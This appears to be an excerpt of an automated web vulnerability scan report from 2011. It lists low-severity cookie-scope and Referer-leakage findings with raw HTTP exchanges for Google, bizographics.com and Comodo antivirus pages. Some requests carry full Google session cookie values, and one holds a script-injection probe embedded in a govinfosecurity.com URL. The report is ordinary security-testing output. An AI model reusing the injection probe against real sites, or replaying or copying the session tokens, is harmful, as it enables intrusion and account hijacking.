Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 18 Sep 2011 12:19:27 GMT
Date: Sun, 18 Sep 2011 12:19:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

10.2. http://id.google.com/verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=5jDNJdHYl6hy7G524Hsvf3N5RrNMBaTwe5ZLSn6kJw=6lUY77-PJ0uhtb3y; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=OBRz60dp-DT3RAGbzX_UkT2S5miM5xizmspOAgxE4g=j_IIDIbd7xiwAAO8; expires=Mon, 19-Mar-2012 01:49:33 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:33 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.3. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=749&url=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&pageUrl=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&time=1316366252200 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eae00085e7e2=1
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sun, 18 Sep 2011 12:16:27 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

11. Cross-domain Referer leakage
There are 439 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


11.1. http://antivirus.comodo.com/antivirus_download.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /antivirus_download.php?af=1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:12 GMT
Content-Type: text/html
Connection: close
Content-Length: 21137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.2. http://antivirus.comodo.com/cis-pro_download.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /cis-pro_download.php?af=1164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:14 GMT
Content-Type: text/html
Connection: close
Content-Length: 28667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.3. http://antivirus.comodo.com/click-track/BTTN/SLIDER/AV

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/AV

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.4. http://antivirus.comodo.com/click-track/BTTN/SLIDER/CompareProductsBestVirus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/CompareProductsBestVirus

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/CompareProductsBestVirus?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:18 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.5. http://antivirus.comodo.com/click-track/BTTN/SLIDER/LearnMoreCleanPC

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/BTTN/SLIDER/LearnMoreCleanPC

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/BTTN/SLIDER/LearnMoreCleanPC?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.6. http://antivirus.comodo.com/click-track/EXE/AV

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/EXE/AV

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/EXE/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:39 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.7. http://antivirus.comodo.com/click-track/IMAGE/CompareAV

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/IMAGE/CompareAV

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/IMAGE/CompareAV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:43 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.8. http://antivirus.comodo.com/click-track/IMAGE/logo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/IMAGE/logo

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/IMAGE/logo?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:44 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.9. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Buy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/AAV-Buy

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/AAV-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:22 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.10. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Trail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/AAV-Trail

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/AAV-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:21 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.11. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Buy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/CIS-PRO-Buy

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/CIS-PRO-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:24 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.12. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Trail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/CIS-PRO-Trail

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/CIS-PRO-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:23 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.13. http://antivirus.comodo.com/click-track/LEAD/CAM/SLIDER/CIS-PRO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/LEAD/CAM/SLIDER/CIS-PRO

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/LEAD/CAM/SLIDER/CIS-PRO?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:20 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
                   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.14. http://antivirus.comodo.com/click-track/NAV/BusinessAV

Summary

Severity:   Information
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /click-track/NAV/BusinessAV

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /click-track/NAV/BusinessAV?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:48 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
